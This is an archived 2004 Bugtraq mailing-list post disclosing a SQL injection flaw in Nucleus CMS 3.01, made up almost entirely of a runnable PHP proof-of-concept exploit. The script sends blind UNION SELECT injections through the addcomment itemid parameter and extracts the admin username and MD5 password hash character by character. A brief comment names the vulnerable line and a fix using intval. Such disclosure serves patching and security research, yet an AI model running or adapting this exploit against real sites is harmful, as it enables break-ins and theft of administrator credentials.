[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: NucleusCMS 3.01 SQL Injection Vulnerability
From: <acidbits () hotmail ! com>
Date: 2004-07-25 21:42:59
Message-ID: 20040725214259.3111.qmail () www ! securityfocus ! com
[Download RAW message or body]
#!/usr/bin/php
<?
// Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept
// By aCiDBiTS acidbits@hotmail.com 24-July-2004
//
// Nucleus CMS (http://nucleuscms.org) is a weblog php+mysql application.
//
// This Proof of Concept dumps the username and MD5(password) of the admin user \
placed at first position // of members table. First of all checks if we can use \
"union select" or it isn't patched and then if first // member is admin.
//
// Usage (in my debian box):
// php4 -q nuc_addc_poc.php URL
// Vulnerability description
//
// In action.php, function addcoment, there's no user input sanization for parameter \
itemid. In line 65: // $blogid = getBlogIDFromItemID($post['itemid']);
// This allows to inject SQL to get data form the database.
//
// Solution
//
// Modify line 65 with:
// $blogid = getBlogIDFromItemID(intval($post['itemid']));
echo "+-------------------------------------------------------------------+\n| \
Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept |\n| By aCiDBiTS \
acidbits@hotmail.com 24-July-2004 \
|\n+-------------------------------------------------------------------+\n\n";
if($argc<2) die("Usage: ".$argv[0]." URL\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';
echo "Checking if vulnerable and \"union select\" works ... ";
if( test_cond("1") && !test_cond("0") ) echo "OK!\n";
else die( "It doesn't :-(\n\n" );
echo "Checking if first member of table is admin ... ";
if( test_cond("1") ) echo "OK!\n";
else die( "It's not :-(\n\n" );
echo "\nGetting username: ";
get_field("mname");
echo "\nGetting MD5(password): ";
get_field("mpassword");
die("\n\nDone!\n\n");
function get_field( $field )
{
$unval= " 0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
$idx=1;
$min=0;
$max=strlen($unval);
while($min!=$max) {
$mid=$min+(($max-$min)/2);
if( test_cond("ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1))) ) {
$idx++;
echo substr($unval,$mid,1);
$min=0;
$max=strlen($unval);
if( !test_cond("ord(substring($field,$idx,1))") ) return;
} else {
if( test_cond("ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1))) ) \
$max=$mid; else $min=$mid;
}
}
die( "\n\nUnexpected error!\n\n");
}
function test_cond( $cond )
{
$res=send_post("action=addcomment&url=index.php%3Fitemid%3D1&itemid=1+and+0+union+sel \
ect+1+from+nucleus_member+where+madmin+and+mnumber=1+and+".urlencode($cond)."&body=a&user=a&userid=");
if( eregi( "nucleus_ban", $res ) )
return 0;
else return 1;
}
function send_post($data)
{
global $host;
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $host."action.php" );
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}
?>
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic